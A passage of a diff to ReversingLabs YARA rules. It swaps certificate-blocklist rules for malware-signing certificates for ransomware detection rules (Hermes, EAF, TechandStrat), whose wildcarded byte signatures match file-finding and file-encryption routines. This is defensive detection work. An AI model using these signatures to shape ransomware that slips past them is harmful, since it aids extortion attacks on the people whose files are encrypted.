+ C0 E9 ?? ?? ?? ?? 33 DB 33 C0 89 5D ?? 0F 57 C0 89 45 ?? 66 0F 13 45 ?? 83 FE ?? 74 + ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 45 + ?? 83 FB ?? 75 ?? 85 C0 75 ?? 33 FF 47 E9 ?? ?? ?? ?? 83 65 ?? ?? 83 7D ?? ?? 77 ?? + 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? + 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 4D ?? + 89 45 ?? 83 F9 ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 51 FF 75 ?? E8 + ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 3D ?? ?? ?? ?? 76 ?? + C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ?? 8B C1 81 C2 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 77 ?? + 72 ?? 81 FA ?? ?? ?? ?? 77 ?? 6A ?? 6A ?? 51 FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 + 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 83 F9 + } + $hermes_encrypt_files_v2_p2 = { + 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 8B 45 ?? EB ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 87 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? + 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? B8 ?? ?? ?? ?? 77 ?? 39 + 45 ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 2B D8 53 56 89 5D ?? FF 15 ?? ?? ?? ?? + 83 F8 ?? 75 ?? 6A ?? 58 E9 ?? ?? ?? ?? 33 DB 8D 45 ?? 53 50 6A ?? 8D 85 ?? ?? ?? ?? + 89 5D ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? EB ?? 8B C3 80 BC 05 ?? ?? ?? ?? + ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? + ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 74 ?? 40 83 F8 + ?? 72 ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? + ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 58 6A ?? 66 89 45 ?? 58 66 89 45 ?? 6A ?? 58 66 89 45 + ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 57 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 68 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 56 89 1E E8 ?? ?? ?? + ?? 57 56 E8 ?? ?? ?? ?? 8D 45 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 56 57 FF 15 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 33 DB 8D 45 + } + $hermes_encrypt_files_v2_p3 = { + 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? E9 ?? ?? ?? ?? + 39 5D ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 + ?? ?? ?? ?? 89 5D ?? 5B 6A ?? 89 4D ?? 33 DB 89 45 ?? 89 55 ?? 5F EB ?? 8B 45 ?? 89 + 45 ?? 53 69 C0 ?? ?? ?? ?? 53 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? E9 ?? ?? + ?? ?? 53 8D 45 ?? 89 5D ?? 50 6A ?? 5F 57 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? + 85 C0 75 ?? 6A ?? E9 ?? ?? ?? ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? + E9 ?? ?? ?? ?? 89 5D ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B + D8 85 DB 75 ?? 6A ?? E9 ?? ?? ?? ?? 8B 55 ?? 33 C9 33 C0 C7 45 ?? ?? ?? ?? ?? 89 4D + ?? 89 45 ?? 83 65 ?? ?? C7 45 ?? ?? ?? ?? ?? 3B CA 75 ?? 8B 4D ?? 89 4D ?? C7 45 ?? + ?? ?? ?? ?? 33 C9 51 51 50 56 89 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? + 6A ?? 8D 45 ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 C7 + } + $hermes_encrypt_files_v2_p4 = { + 45 ?? ?? ?? ?? ?? 51 8D 45 ?? 50 51 51 FF 75 ?? 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 + 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 53 6A ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? + ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F + 84 ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 + 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 41 8B 55 ?? 05 ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B + CA 0F 86 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 7D ?? 66 C7 45 ?? ?? ?? AB AB AB + AB 66 AB 33 C0 88 45 ?? 39 45 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 8D 45 ?? 50 8D 45 + ?? 50 E8 ?? ?? ?? ?? 59 59 EB ?? 6A ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 33 C0 8D 7D ?? + AB 6A ?? AB 66 AB 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 FF 8D 45 ?? 57 50 8D + 45 ?? 89 7D ?? 50 E8 ?? ?? ?? ?? 59 50 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? + 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 57 57 6A + } + $hermes_encrypt_files_v2_p5 = { + FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? + ?? 6A ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 57 6A ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 + C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 57 8D 45 ?? 89 + 7D ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? + ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 39 7D ?? 77 ?? 81 7D ?? ?? ?? ?? ?? + 76 ?? 6A ?? 57 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 + ?? 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? EB ?? 57 8D 45 ?? 89 7D ?? 50 + 6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF + 15 ?? ?? ?? ?? 6A ?? EB ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? + 83 C4 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? 5B EB ?? 68 ?? ?? ?? ?? 6A ?? + 53 FF 15 ?? ?? ?? ?? 6A ?? 5B 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B C3 + EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ?? + ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? + ?? ?? 6A ?? 5F EB ?? 6A ?? 5F 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? EB ?? 6A ?? E9 ?? ?? ?? ?? 6A ?? 5F 56 FF 15 ?? + ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 + } + $hermes_find_files_v2_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 85 ?? ?? ?? ?? 56 57 50 68 ?? ?? ?? ?? 53 + E8 ?? ?? ?? ?? 59 59 50 FF 15 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 53 89 7D ?? E8 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 53 8B F0 E8 ?? ?? ?? ?? 2B C6 33 C9 83 C4 ?? 66 89 0C 43 83 + FF ?? 0F 84 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83 F8 ?? 75 ?? + 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 + FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83 + F8 ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D + 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 6A ?? 5F 6A + ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 59 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? + 66 89 45 ?? 33 C0 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 + } + $hermes_find_files_v2_p2 = { + 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 45 ?? 58 6A ?? 66 89 45 + ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 55 ?? + 66 89 55 ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 66 89 85 ?? ?? ?? ?? 58 6A ?? 66 89 4D ?? + 66 89 4D ?? 66 89 8D ?? ?? ?? ?? 59 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? + ?? 33 C0 66 89 7D ?? 66 89 BD ?? ?? ?? ?? 8D 7D ?? 89 75 ?? 66 89 75 ?? 66 89 55 ?? + 89 75 ?? 66 89 75 ?? 66 89 8D ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? + AB 6A ?? 66 89 4D ?? 66 89 55 ?? AB 66 89 55 ?? 89 75 ?? AB 66 AB 58 6A ?? 66 89 45 + ?? 58 6A ?? 5F 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? + 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 59 66 89 45 ?? 33 C0 66 89 45 ?? 6A ?? 58 + 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A + ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 33 C0 66 89 7D ?? 66 89 7D + ?? 8D BD ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 8D + } + $hermes_find_files_v2_p3 = { + AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D + 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 + C0 0F 84 ?? ?? ?? ?? 8B 7D ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 + ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 + 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 + } + $hermes_find_files_v2_p4 = { + 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85 + ?? ?? ?? ?? 50 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 + ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 + 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D + 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? EB ?? 8B 7D ?? F6 85 ?? ?? ?? + ?? ?? 74 ?? 53 E8 ?? ?? ?? ?? 59 FF 75 ?? 8D 85 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 50 53 + E8 ?? ?? ?? ?? 59 59 50 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B F0 8D + 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 2B F0 83 C4 ?? 33 C0 66 89 44 73 ?? 33 F6 8D 85 ?? + ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E + 5B 8B E5 5D C3 + } + $hermes_enum_resources_v2 = { + 55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 33 DB C7 45 ?? + ?? ?? ?? ?? 53 53 6A ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? + 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D + 45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 7E ?? 6A ?? 58 66 + 39 07 75 ?? 66 39 47 ?? 75 ?? 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 57 FF + 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ?? + ?? ?? 74 ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 33 C0 5F 5E 5B 8B E5 5D C3 + 33 C0 40 EB + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Buster Paper Comercial Ltda" and pe.signatures[i].serial=="07:b4:4c:db:ff:fb:78:de:05:f4:26:16:72:a6:73:12" and 1359503999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ((( all of ($hermes_find_files_v1_p*)) and ( all of ($hermes_encrypt_files_v1_p*))) or (( all of ($hermes_find_files_v2_p*)) and ( all of ($hermes_encrypt_files_v2_p*)))) and ( any of ($hermes_enum_resources_v*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4F8B9A1Ba5E60C754Dbb40Ddee7905E2 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_EAF : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects EAF ransomware." author = "ReversingLabs" - id = "9b6ba6bb-a796-59e1-a38b-04d4b60a99a6" - date = "2023-11-08" - modified = "2023-11-08" + id = "6903030e-b1a1-5238-b377-ce8e4b18d3f3" + date = "2022-07-22" + modified = "2022-07-22" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L621-L637" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2a0d07d47cd41db5dc170a29607b6c1f2e3b7c0785f83b211f68f9cb9368e350" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.EAF.yara#L1-L89" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3d10c852f95e8aa9bcd3543b96650b98ac57bcd2aa2b374e0badb63b5a4c0396" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "EAF" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 00 03 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 39 ?? ?? ?? ?? 00 7E ?? + ?? ?? ?? 0C 03 28 ?? ?? ?? ?? 0D 03 28 ?? ?? ?? ?? 13 ?? 1E 8D ?? ?? ?? ?? 25 16 11 ?? + A2 25 17 72 ?? ?? ?? ?? A2 25 18 7E ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 28 ?? + ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 09 A2 25 1D 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? + 13 ?? 02 03 11 ?? 08 28 ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 2B ?? 16 13 ?? 11 ?? 2C ?? 00 00 03 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00 + 00 00 DE ?? 26 00 00 DE ?? 2A + } + $encrypt_files_p2 = { + 00 03 19 73 ?? ?? ?? ?? 0A 00 04 18 73 ?? ?? ?? ?? 0B 00 06 16 6A 6F ?? ?? ?? ?? 00 28 + ?? ?? ?? ?? 0C 00 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 05 09 73 ?? + ?? ?? ?? 13 ?? 00 08 17 6F ?? ?? ?? ?? 00 08 18 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ?? + ?? ?? ?? 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 08 6F ?? + ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 20 ?? ?? ?? ?? 13 ?? 11 ?? 8D ?? ?? ?? ?? 13 ?? 16 + 13 ?? 00 06 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 13 + ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ?? + 32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 + 11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 + 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? + 00 07 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 58 13 ?? 00 11 ?? 16 FE 03 13 ?? + 11 ?? 3A ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? + 00 DC 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08 2C ?? 08 6F ?? ?? ?? + ?? 00 DC 07 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06 6F ?? ?? ?? + ?? 00 00 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC 03 28 ?? ?? ?? ?? 00 17 13 ?? DE ?? 26 + 00 16 13 ?? DE ?? 11 ?? 2A + } + $find_files_p1 = { + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D 00 09 06 08 9A + 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 09 FE 06 ?? + ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? + ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 06 08 9A 6F ?? ?? ?? ?? 00 00 00 08 17 + 58 0C 08 06 8E 69 FE 04 13 ?? 11 ?? 3A ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 16 + 13 ?? 2B ?? 00 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 07 11 ?? 9A 28 ?? ?? ?? ?? 00 + 00 00 11 ?? 17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 DE ?? 26 00 00 DE ?? + 2A + } + $find_files_p2 = { + 00 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 00 08 7B + ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 7B ?? ?? ?? ?? 6F ?? + ?? ?? ?? 2B ?? 16 0D 09 2C ?? 00 08 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 06 8E 69 32 ?? 00 DE ?? 26 00 00 DE ?? 2A + } + $destroy_exe_file = { + 00 1F ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 7E ?? + ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 1B 8D ?? + ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 06 A2 25 18 72 ?? ?? ?? ?? A2 25 19 28 ?? ?? ?? + ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 + DE ?? 26 00 00 DE ?? 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NOX Entertainment Co., Ltd" and pe.signatures[i].serial=="4f:8b:9a:1b:a5:e6:0c:75:4d:bb:40:dd:ee:79:05:e2" and 1348617599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($destroy_exe_file) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0A389B95Ee736Dd13Bc0Ed743Fd74D2F : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Techandstrat : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects TechandStrat ransomware." author = "ReversingLabs" - id = "43cce248-2322-5607-8706-aeab046a30b9" - date = "2023-11-08" - modified = "2023-11-08" + id = "525d0b48-2018-5848-b9e7-def8395254eb" + date = "2021-05-17" + modified = "2021-05-17" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L639-L655" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8b83e4aa47cea7cadf4b4a9f4e044478a62f4233e082fb52f9ed906d80a552aa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.TechandStrat.yara#L1-L106" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "80e201cf91adeee100e05af3ba5227fc61968bb6e0ce602107ba1217a7a62856" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "TechandStrat" + tc_detection_factor = 5 importance = 25 + strings: + $enum_shares_p1 = { + 55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 